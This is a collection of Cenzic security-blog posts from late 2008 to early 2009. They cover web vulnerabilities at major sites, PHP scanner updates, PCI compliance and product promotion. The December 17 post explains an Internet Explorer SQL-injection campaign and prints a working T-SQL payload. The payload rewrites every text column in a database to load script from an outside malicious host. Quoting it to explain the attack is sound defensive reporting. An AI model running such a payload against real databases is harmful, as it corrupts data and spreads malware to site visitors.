What's New

The Latest Postings for Cenzic Security Blog

January 05, 2009
Excerpt from:  Web Application Security Insights

Facebook Can be Hacked Due to XSS Vulnerabilities

Facebook contains highly critical XSS vulnerabilities for hackers to exploit, posing privacy risks to users

The XSSed site reported a series of highly critical XSS vulnerabilities on Facebook (December 15, 2008 and again on January 4, 2009) that hackers can exploit.  The affected Facebook functionality includes the new user registration page, the iPhone login, the reset password pages, and others.

Malicious people can exploit these XSS bugs to infect millions of Facebook members with malware, adware and spyware.

So far, Facebook has not fixed these flaws, so be very careful when using your account by questioning suspicious requests and not accepting friend invites from people you don’t know. 

by
Erin Swanson
Eswanson@cenzic.com

January 04, 2009
Excerpt from:  Vulnerability and Security News

Cenzic CEO John Weinschenk Featured on Application Security Myth Buster Series

Podcast on application security myth busters features John Weinschenk, CEO of Cenzic

Cenzic is proud to interview its own CEO, John Weinschenk, as part of its Myth Buster series on application security.  This is an additional podcast to the six interviews already conducted on the show floor at the 2008 BlackHat Conference in Las Vegas, NV.

Mr. Weinschenk reiterated many of the other panelists’ statements about the state of application security:  the biggest issue stems from a lack of security understanding.  He’s seeing a trend in which the government is starting to fine companies for not having secure Websites in the first place, regardless of whether data was stolen.  And with the new president coming into office on January 20 with his cyber security initiatives, it’s more important than ever to secure your Website against hacker attacks.

With regards to Web application security, every company should have the same slogan as Obama’s presidential campaign:  Yes We Can!  

If you have any other questions or topic suggestions about the latest myths out there, send an email to:  mythbusters@cenzic.com

by
Erin Swanson, Marketing
Eswanson@cenzic.com

January 04, 2009
Excerpt from:  Cenzic SmartAttack Updates for Web Vulnerabilities

Cenzic Adds New SmartAttack for JavaScript Hijacking

New support added for JavaScript Hijacking Vulnerability in Cenzic SmartAttack library

A New Year means adding a new SmartAttack for Cenzic – the JavaScript Hijacking SmartAttack – making it our 96th SmartAttack!  We added this support to the SmartAttack library arsenal on January 2, 2009 due to the rising number of eavesdropping attacks against AJAX-style Web applications.  This vulnerability was discovered on Gmail and recently fixed.

JavaScript Hijacking is an attack that tricks the victim into loading a page that contains a malicious request.  The request is malicious because it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf.  If an application is vulnerable, an attacker can force a logged-in victim's browser to send pre-authenticated AJAX requests to the vulnerable Web application, potentially forcing the victim's browser to perform a hostile action.  This allows the attacker to perform any legitimate action that a legitimate user can perform after logging in.

And because our development team felt extra ambitious over the holiday season, we also added enhanced support for our Web Server SmartAttack by updating it with the PHP 'imageRotate()' Uninitialized Memory Information Disclosure Vulnerability (Bugtraq ID 33002).  More information about this vulnerability can be found at:
http://www.securityfocus.com/bid/33002/

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     
Background on Cenzic’s SmartAttacks
Every week, Cenzic’s suite of products is updated with the latest vulnerabilities (custom, commercial, and open-source) to use when it emulates a hacker and attacks our customers’ Websites to assess their security posture.  These Web application vulnerabilities include (but are not limited to) cross-site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types.

by
Erin Swanson
ESwanson@cenzic.com


December 31, 2008
Excerpt from:  Vulnerability and Security News

Cyber Terrorism on the Rise for 2009

Website vulnerabilities and cyber terrorism threaten national security
Cyber attacks at the national level are no longer theoretical occurrences; they are a legitimate security threat.
– Mandeep Khera, CMO

With the ever increasing economic turmoil ravaging the US and the rest of the world, cyber terrorism has now grown to a national security scale.  According to this article, picked up by MSNBC, hackers are now more desperate and determined to exploit the ever growing number of vulnerabilities in Websites and Web applications in 2009.

Research conducted by Cenzic and others estimates that about 7,000 vulnerabilities will be reported for 2008. Of these, over 70 percent are related to Web applications and over 65 percent are easily exploitable. Similar results are expected in 2009, proving that the United States is not prepared for a direct cyber terrorist attack.

This news is so important, it was even picked up by MSNBC.   

How will you protect your data against hackers?  There are a lot of options out there, but remember that network security and SSL solutions won’t work on their own, as you need to check for security defects at the Web application level.  At the risk of sounding biased, we recommend you take a look at Cenzic’s offerings to guard your Website against hacker attacks.  What do you have to lose?

Have a safe and Happy New Year.
Erin Swanson
Eswanson@cenzic.com

December 30, 2008
Excerpt from:  Cenzic SmartAttack Updates for Web Vulnerabilities

Cenzic updates PHP Vulnerability for Buffer Overflow Weakness

Cenzic provides enhanced support for the PHP ‘mbstring’ Extension Buffer Overflow Vulnerability in its Web Server SmartAttack

On December 26, 2008, Cenzic added enhanced support to their Web Server SmartAttack which includes updates to the PHP ‘mbstring’ Extension Buffer Overflow Vulnerability (BugtraqID 32948). 

PHP is prone to a buffer overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.  Hackers can exploit this vulnerability to execute arbitrary machine code in the context of the affected Web server.  Even failed attempts will likely crash the Web server, denying service to legitimate users.

The following PHP versions are affected:

PHP/5.1.1 to PHP/5.1.6
PHP/5.0.0 to PHP/5.0.5
PHP/4.4.1 to PHP/4.4.9
PHP/4.3.1 to PHP/4.3.9

Detailed information can be found at:
http://www.securityfocus.com/bid/32948/

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     

by
Erin Swanson
ESwanson@cenzic.com

December 23, 2008
Excerpt from:  Vulnerability and Security News

PCI Compliance Does Not Equal Security

Growing number of firms report hacker attacks after adhering to PCI Compliance regulations
PCI compliance is like a driver's license - it may mean that a retailer has passed the test for compliance, but doesn't necessarily mean it's in compliance.
– Linda McGlasson, Managing Editor

An article about the top 10 security breaches of 2008 cited that 2 of the 10 breaches hit companies that were in compliance with PCI regulations.

Both the Maine-based Hannaford Brothers grocery store chain and the ski resort Okemo were hit by hackers who installed malicious software on their Websites to capture credit card data.  And at the time of both attacks, the companies were PCI compliant.  These firms now share company with the likes of Forever 21 – a retail clothing company – that was the victim of a similar attack back in October.

I liked how the author summarized PCI compliance: 

Lesson Learned:  PCI compliance is like a driver's license -- it may mean that a retailer has passed the test for compliance, but doesn't necessarily mean it is in compliance.

At the risk of sounding redundant, we will stress again that companies must do more than just attain PCI compliance.  They must constantly test and re-test their Websites for the latest vulnerability threats, as 400 new ones emerge every month.

by
Erin Swanson
Eswanson@cenzic.com

December 22, 2008
Excerpt from:  Web Application Security Insights

YouTube: Real World Hacking Example

CSRF vulnerabilities discovered in almost every action a user could perform on YouTube

YouTube is the second big-brand company from Bill Zeller’s recent paper and post that we are featuring; it got hacked through a CSRF vulnerability.

Zeller discovered CSRF vulnerabilities in nearly every action a user could perform on YouTube.  Specific details are described in the paper. 

Here are a few examples of what an attacker could do on YouTube via the CSRF vulnerabilities: 

§ Add videos to a user's "Favorites,"
§ Add himself to a user's "Friend" or "Family" list,
§ Send arbitrary messages on the user's behalf,
§ Flag videos as inappropriate,
§ Automatically share a video with a user's contacts,
§ Subscribe a user to a "channel" (a set of videos published by one person or group) and,
§ Add videos to a user's "QuickList" (a list of videos a user intends to watch at a later point).

According to the report, YouTube has fixed these vulnerabilities.

by
Erin Swanson
Eswanson@cenzic.com

December 19, 2008
Excerpt from:  Web Application Security Insights

Real World Hacking Example: The New York Times

CSRF vulnerability in the New York Times Website allows hackers to detect email addresses of users

According to a recent post and paper by Bill Zeller, The New York Times was among four popular Websites that got hacked through a CSRF vulnerability.

This CSRF vulnerability was exploited to extract the email address of a user.  The attack can be used for identification (e.g., finding the email addresses of all users who visit an attacker's site) or for spam. This attack is particularly dangerous because of the large number of users who have NYTimes' accounts and because the NYTimes keeps users logged in for over a year. 

According to the report, the New York Times fixed this issue after a few months of prodding by the author. 

Here’s a great summary by the author about CSRF and how little the IT and security community knows about this vulnerability:

The Sleeping Giant
Cross-Site Request Forgery (CSRF) attacks occur when a malicious Website causes a user’s Web browser to perform an unwanted action on a trusted site. These attacks have been called the “sleeping giant” of Web-based vulnerabilities, because many sites fail to protect against them and they’ve been largely ignored by the Web development and security communities.  CSRF attacks do not appear in the Web Security Threat Classification and are rarely discussed in academic or technical literature.  CSRF attacks are simple to diagnose, simple to exploit and simple to fix. They exist because Web developers are uneducated about the cause and seriousness of CSRF attacks.  Web developers also may be under the mistaken impression that defenses against the better-known Cross-Site Scripting (XSS) problem also protect against CSRF attacks.

by
Erin Swanson
ESwanson@cenzic.com

December 19, 2008
Excerpt from:  Vulnerability and Security News

Cenzic Named Finalist for 2009 Hot Company List by Network Products Guide

Network Product Guide names Cenzic among the top hot companies for 2009

Hot off the press – Cenzic was just named as one of the top “Hot Companies” in 2009 by Network Products Guide.  We share the limelight with esteemed tech giants like Red Hat and VeriSign.

The winner out of the 71 finalists will be named on March 26-27, 2009 at the Gala Award Ceremony in San Francisco. 

by
Erin Swanson
Eswanson@cenzic.com

December 19, 2008
Excerpt from:  Cenzic SmartAttack Updates for Web Vulnerabilities

Cenzic updates PHP Vulnerability for Security Bypass Weakness

Cenzic provides enhanced support for the PHP Vulnerability for security bypass weakness in its Web Server SmartAttack

On December 19, 2008, Cenzic added enhanced support to their Web Server SmartAttack which includes updates to the PHP Vulnerability for security bypass weakness (BugtraqID 32673).  Specifically, the updates are to the PHP 5.2.7 'magic_quotes_gpc' Security Bypass Weakness Vulnerability.
 
Hackers can exploit this vulnerability by bypassing security checks in PHP applications that rely on the Magic Quotes functionality.  This opens such applications up to attacks that take advantage of the software's failure to properly sanitize user input.

PHP version 5.2.7 is affected.

Detailed information can be found at:
http://www.securityfocus.com/bid/32673/

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     

by
Erin Swanson
ESwanson@cenzic.com

December 17, 2008
Excerpt from:  Vulnerability and Security News

Microsoft Issues Patch for IE Due to SQL Injection Vulnerability

Without patch, hackers can exploit a user’s computer through a SQL Injection vulnerability in IE

Big news today as Microsoft issued an emergency security patch for their IE browser due to a SQL injection vulnerability.  What’s interesting is that even though this is a vulnerability in IE 7 (it has only been found in 7), it’s being exploited through vulnerable Web servers.  Hence, you cannot have one without the other.

Attackers have been using a SQL injection vulnerability to exploit a Website and leave behind a nasty piece of JavaScript.  The SANS Storm Center explains it quite well and shows the original code.

The code on the site above can be decoded as:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or 
                      b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=http:// 17gamo . com/1.js></script>''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

You can see the JavaScript in the above decoded code …
<script src=http:// 17gamo . com/1.js></script>

This is what is sent to the vulnerable IE 7 browser.  Hence, after the Website has been injected, this JavaScript waits for the vulnerable IE 7 which then activates the malicious code and the browser gets owned. 

This is fascinating because of its codependence.  The vulnerable Website and the vulnerable IE 7 work together to make this attack happen.  We could get philosophical and talk about the chicken or egg thing.  The vulnerable site is at fault, but so is the end user who isn't patching their browser. 

So if you have a Web application on the Internet you should be diligent about knowing whether or not your site is secure.  2008 has certainly been the year of the SQL injection and I am guessing 2009 will be about the same especially if we continue to ignore these vulnerable sites.  Be a good citizen of the Internet and scan your site for these vulnerabilities. 

<and now for the shameless plug> 

Cenzic has a product that scans your Website remotely for these and other vulnerabilities and shows you results in just one week.  Call us today – you’d be helping the Internet be a safer place. 

by
Doug Simpson, Sales Engineering
DSimpson@cenzic.com


December 16, 2008
Excerpt from:  Web Application Security Insights

FAQs for PCI Compliance 6.6

Get a full list of PCI compliance 6.6 FAQs gathered from our live Web seminar

If you have specific questions about PCI 6.6 compliance, email me to get a full list of our FAQs gathered from our live Web seminar audience.  We take the time to list all the audience questions and answer each one, so take advantage of all our time and research and get a copy today.

Here are a couple of Q&A examples:

by
Erin Swanson
Eswanson@cenzic.com

Q:  Who is collecting the PCI fines and how?

A:  Fines are typically levied by VISA, MC, Discover, etc. on the merchants and acquirers.  If a card company finds that the merchant is non-compliant, it sends them a notice of non-compliance and asks them to pay penalties.

Q: Are there/what are the fines for levels 3 and 4? What are the drop dead dates for compliance by companies under versions 1.1 and 1.2?

A: Although there are no specific fines outlined by PCI, each credit card company can impose fines for non-compliance.  Right now, the guidelines are: Level 3 Merchants – contact your acquirer or credit card company; Level 4 Merchants – must have a compliance plan submitted, via the acquirer, to Visa by July 30, 2007.   According to Visa, currently:

* 77 percent of Level 1 merchants were PCI compliant
* 78 percent of Level 2 merchants were PCI compliant
* 56 percent of Level 3 merchants were PCI compliant


December 15, 2008
Excerpt from:  Vulnerability and Security News

Top Cyber Crime Stories of 2008

TJ Maxx hack is named as one of the top cyber crime stories in 2008

December is always the month of reflection and this year is no different, with the following article listing the top 12 cyber crime stories of 2008.

TJ Maxx – the now infamous retail chain store – was included in the list as the victim of the largest breach of credit card numbers on record (45.6 million credit and debit card numbers were affected). 

Back in July 2008, the US DOJ revealed that a group of hackers used a combination of wardriving, sniffer software, and SQL Injection attacks to steal over 45.6 million credit and debit card numbers from TJ Maxx (and others such as OfficeMax and Barnes & Noble) and store them on underground server systems in the US, Latvia, and Ukraine.  The DOJ has indicted 11 alleged hackers on charges of computer fraud, wire fraud, access device fraud, and aggravated identity theft.  So far only one of the 11 people charged by the DOJ has pleaded guilty.

I'm sure there will be more news and information about the hacks in 2009.

by
Erin Swanson
Eswanson@cenzic.com


December 12, 2008
Excerpt from:  Cenzic SmartAttack Updates for Web Vulnerabilities

Cenzic updates PHP Vulnerability for Shared-Hosting Configuration

Cenzic provides enhanced support for the PHP Vulnerability for shared-hosting configuration in its Web Server SmartAttack

On December 12, 2008, Cenzic added enhanced support to their Web Server SmartAttack which includes updates to the PHP vulnerability for shared hosting configuration (BugtraqID 32688).  Specifically, the updates are to the PHP SAPI 'php_getuid()' Safe Mode Restriction-Bypass Vulnerability.

Shared-hosting configurations have gained popularity in the past few months, and PHP is prone to a 'safe_mode' restriction-bypass vulnerability.  Successful exploits could allow an attacker to bypass some safe-mode restrictions.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' restrictions assumed to isolate the users from each other.

Versions prior to PHP 5.2.8 are vulnerable.

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     

by
Erin Swanson
ESwanson@cenzic.com

December 11, 2008
Excerpt from:  Web Application Security Insights

Echelon One CEO Bob West Featured on Application Security Myth Buster Series

Podcast on application security myth busters features Bob West, Founder and CEO of Echelon One

Cenzic is proud to interview Bob West, Founder and CEO of Echelon One, as part of its Myth Buster series on application security.  This is the last of the six podcast interviews conducted on the show floor at the 2008 BlackHat Conference in Las Vegas, NV.

Mr. West said that the state of application security is far less than ideal for two main reasons.  The first stems from the lack of understanding at the executive level about application security.  The second is developers’ inability to code securely.  Companies need to train their developers and QA employees on how to build secure code in order to ensure their Web apps aren’t as vulnerable to hacker attacks.

Bob summarizes his feelings about Web application security in these words:  Draw a line in the sand and do the bare minimum - take an inventory of all your Web applications.  Then prioritize this list to focus on the security health of your most mission critical apps first. 

So take 8 minutes of your day to listen to the podcast to hear more of his insights. 

If you have any other questions or topic suggestions about the latest myths out there, send an email to:  mythbusters@cenzic.com


by
Erin Swanson, Marketing
Eswanson@cenzic.com

December 10, 2008
Excerpt from:  Vulnerability and Security News

CBS Website Hit by iFrame Attack

Big brands like CBS are targets for ‘fashionable’ iFrame attacks

The big TV network CBS is the latest big brand name to have its Website hacked via an iFrame attack.

According to this recent article, Russian malware distributors were able to launch an iFrame attack on a subdomain of the cbs.com site so that it was serving remote malware to any visitor of the site.  A user’s vulnerability to the malware attack launched by the site hack would depend on a variety of factors such as the security used on the PC, the OS, and even the browser version.

What is an iFrame?

An iFrame is an element within an HTML page that can be loaded and refreshed separately from the rest of the page to make more interactive applications possible (and thus is often used by AJAX).  Example applications include rich text editors such as the one used by Google Docs.  iFrames can be exploited (1) when the site is hacked, (2) when an XSS causes a reload of the iFrame using external “hacker code”, or (3) when a SQL query includes an injection of “hacker code” to be loaded into the iFrame.

It seems that someone infected with Asprox visited an area within CBS’s Website that had an XSS or SQL Injection vulnerability. 

How the Attack Occurred:  the Asprox Injection Process

  1. The end-user visits the infected legitimate site (CBS.com) and is redirected to a malicious Website
  2. Multiple redirects using JAVA and iFrames land the user on servers running Neosploit
  3. The end-user is infected with Asprox malware
  4. The user’s infected box is now both a zombie and a host for Asprox
  5. The end-user infects further Websites via SQL Injection, and these redirect further end-users to it

2008 appears to have become the year of the SQL injection, and the makers of Asprox have figured out how to include this in their attack arsenal.  Web application security scanning solutions such as Cenzic Hailstorm can discover these vulnerabilities in your Web app before Asprox or an infected visitor finds and exploits them.

We’ll be giving CBS.com a call.

by
Doug Simpson & Mike Kazmierczak, Sales Engineers
Dsimpson@cenzic.com and Mike@cenzic.com

December 09, 2008
Excerpt from:  Web Application Security Insights

Dr. Art Conklin Featured on Application Security Myth Buster Series

Podcast on application security myth busters featuring Art Conklin, Ph.D., Assistant Professor at the University of Houston

Cenzic is proud to interview Art Conklin, Ph.D., as part of its Myth Busters series on application security.  This is the fifth of six podcast interviews conducted on the show floor at the 2008 BlackHat Conference in Las Vegas.

Art Conklin – an assistant professor at the University of Houston – said that universities are just like any other company as they struggle in securing their Websites and Web applications.  Universities are prime targets for hacker attacks as they have large amounts of information accessible via Web applications.

According to Dr. Conklin, most companies and IT professionals believe they are doing a “good enough” job, but it’s the biggest myth out there.  There is no silver bullet and no single “werewolf”:  for every type of Web security issue, you need a specific Web security solution.  So don’t rely solely on SSL, for example.  You need this type of security, but it’s not a panacea against every attack out there. 

Dr. Conklin summarizes his feelings about the application security market in these words:  If you aren’t doing something proactive about Web security, then you need to go into a new career, as you won’t last very long.

So take 10 minutes of your day to listen to the podcast to hear more of his insights. 

If you have any other questions or topic suggestions about the latest myths out there, send an email to:  mythbusters@cenzic.com


by
Erin Swanson, Marketing
Eswanson@cenzic.com


December 05, 2008
Excerpt from:  Cenzic SmartAttack Updates for Web Vulnerabilities

Cenzic Updates Web Server Vulnerability SmartAttack

Cenzic provides enhanced support for its Web Server SmartAttack that includes PHP ZipArchive updates

On December 5, 2008, Cenzic added enhanced support to their Web Server SmartAttack that includes updates to PHP ZipArchive.  Details are listed below.

Web Services SmartAttack

  • PHP ZipArchive::extractTo() '.zip' Files Directory Traversal Vulnerability (BugtraqID 32625)

    PHP has recently been found to be prone to a directory-traversal vulnerability.  The affected application fails to adequately sanitize user-supplied input. A successful attack allows an attacker to create or overwrite arbitrary files on the system, which in turn allows execution of arbitrary script code in the context of the Web server.   This vulnerability is especially dangerous, as an attacker could exploit it using standard client applications.  PHP versions affected: PHP/5.2.1 to PHP/5.2.6
    Detail information can be found at: http://www.securityfocus.com/bid/32625/solution

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     

by
Erin Swanson
ESwanson@cenzic.com

December 04, 2008
Excerpt from:  Web Application Security Insights

5 Must-Do Cyber Security Steps for Obama

Web app security tops the list of must-do cyber security items for the Obama administration

According to CSO Online, there are 5 top things Obama should do about cyber security, and Web application security is at the top of the list.

Our own CMO, Mandeep Khera was quoted as saying:

"Obama [and his IT security advisors] needs to focus on securing Web applications that have largely been ignored by previous administrations.  With millions of hacking attempts on our government infrastructure every day and thousands of successful attacks against corporations through the Web site, government needs to step in and create stronger regulations to enforce the security of our Web sites."

Here are the Top 5 suggestions made by CSO Online:

1. Secure Web apps
2. Wipe the dust off of older regs
3. Demand better security training
4. Build a great cyber wall (against China and others)
5. Give someone control (and make them accountable)

by
Erin Swanson
Eswanson@cenzic.com

December 03, 2008
Excerpt from:  Vulnerability and Security News

SaaS Applications Vulnerable to Hacker Attacks

New technologies like SaaS applications introduce new security risks

Enterprise Management Quarterly just picked up an article I wrote on the latest security threats showing up in SaaS applications.  If you are a company that hosts a SaaS application or you use such a technology, you should take a look.

Some highlights in the article include:

  • SaaS providers are becoming the gatekeeper for sensitive information, whether in the form of personal data or corporate data. 
  • Virtualization comes into play to improve the process of regularly staging copies of your production applications.
  • Continuous testing will ensure that your organization will mitigate risks in the increasingly popular SaaS offerings.

Also, you should check out our MythBuster series on Web application security that is featured on our blog.  Click on the link:  http://blog.cenzic.com/public/item/212740 to listen to the podcast and get answers addressing:

  1. Do SSL and Network security tools protect your Web sites against hacker attacks? 
  2. Can you get away with testing your applications only in QA and Dev?
  3. Are commercial Web applications like SAP and Oracle safe to use or do you need to test them for vulnerabilities?
  4. Is attaining PCI compliance enough to secure you against hacker attacks?

by
Lars Ewe, CTO
Lars@cenzic.com

December 03, 2008
Excerpt from:  Cenzic SmartAttack Updates for Web Vulnerabilities

Cenzic Updates Web Server Vulnerability SmartAttack

Cenzic provides enhanced support for its Web Server SmartAttack that includes PHP and Apache Tomcat updates

On November 28, 2008, Cenzic added enhanced support to their Web Server SmartAttack that includes updates to PHP and Apache Tomcat.  Details are listed below.

Web Services SmartAttack

  • PHP Zip_Entry_Read() Integer Overflow Vulnerability (BugtraqID 23169)
    • Versions of PHP have been found to be prone to an integer-overflow vulnerability. Affected versions of PHP, which the SmartAttack identifies and scans for, fail to ensure that integer values are not overrun. Attackers may exploit this issue to cause a heap-based buffer overflow.  It is important to identify such a vulnerability as early as possible: exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application, and even failed exploit attempts will likely result in a denial-of-service condition.
      Detail information can be found here: http://www.securityfocus.com/bid/23169/solution
  • Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability (BugtraqID 22791)
    • This update enables Cenzic to unearth another vulnerability in the Apache Tomcat Servlet Container.  Apache Tomcat is prone to a vulnerability that allows remote attackers to execute arbitrary code on an affected computer. A successful attack may result in a complete compromise.
      Detail information can be found here: http://www.securityfocus.com/bid/22791/solution

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     

by
Erin Swanson
Eswanson@cenzic.com